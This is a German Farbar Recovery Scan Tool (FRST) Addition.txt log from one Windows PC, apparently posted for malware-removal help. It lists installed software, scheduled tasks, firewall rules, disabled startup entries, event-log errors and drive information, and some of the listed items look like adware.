TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TrackMania United (HKLM-x32\...\Steam App 7200) (Version:  - Nadeo)
TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN)
VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd)
Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft)
Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton)
William Hill Poker (HKLM-x32\...\William Hill Poker) (Version:  - )
WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie)
Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Wuala) (Version: 1.0.444.0 - LaCie)
Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie)
Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie)
Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

19-09-2015 12:22:08 Gerätetreiber-Paketinstallation: Disc Soft Ltd Speichercontroller
19-09-2015 12:25:24 Installed Microsoft Office Professional Plus 2013
19-09-2015 12:25:49 PROPLUS
19-09-2015 12:38:57 Installed Microsoft Office Professional Plus 2013
19-09-2015 12:39:23 PROPLUS
19-09-2015 15:39:41 Installed Microsoft PowerPoint MUI (English) 2013
19-09-2015 15:40:31 Installed Microsoft PowerPoint MUI (English) 2013
19-09-2015 15:55:13 Installed Microsoft Office Professional Plus 2013
19-09-2015 15:56:35 PROPLUS
19-09-2015 16:15:26 Windows Update
20-09-2015 18:01:04 JRT Pre-Junkware Removal

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2015-09-21 18:32 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd)
Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated)
Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software)
Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=5.3.0.111.261&amp;LastError=404
Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig)
Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung"
Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly
Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2015-09-19 11:34 - 2015-09-19 11:34 - 01610240 _____ () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs
2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU
AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> 
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> 
HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\eLoot\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\Tabea Studium\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe"
MSCONFIG\startupreg: Bitdefender-Geldb�rse => 
MSCONFIG\startupreg: Bitdefender-Geldb�rse-Anwendungs-Agent => 
MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min
MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun
MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU
MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe
MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe
FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe
FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe
FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe
FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe
FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe
FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe
FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe
FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe
FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe
FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin
FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin
FirewallRules: [{1AFD0420-A3E2-4D4C-89BF-9175F1E06A0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe
FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (09/23/2015 04:42:41 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm firefox.exe, Version 40.0.3.5716 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 15dc

Startzeit: 01d0f4e91e3afce0

Endzeit: 175

Anwendungspfad: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Berichts-ID: bfe47101-619c-11e5-bda6-001e8c09ea3d

Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15382

Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15382

Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 14383

Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 14383

Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 13385

Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 13385

Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


Systemfehler:
=============

CodeIntegrity:
===================================
  Date: 2015-09-21 18:26:06.410
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2015-09-21 18:26:06.394
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2015-09-09 00:48:00.156
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.111
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.054
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.010
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.933
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.879
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.840
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.785
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+
Prozentuale Nutzung des RAM: 47%
Installierter physikalischer RAM: 4094.49 MB
Verfügbarer physikalischer RAM: 2167.05 MB
Summe virtueller Speicher: 8187.13 MB
Verfügbarer virtueller Speicher: 5641.07 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:186.31 GB) (Free:70.02 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:483.76 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D)
Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C)
Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
         
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:23-09-2015
durchgeführt von Kenny G (Administrator) auf KENNYG-PC (23-09-2015 04:59:45)
Gestartet von C:\Users\Kenny G\Downloads
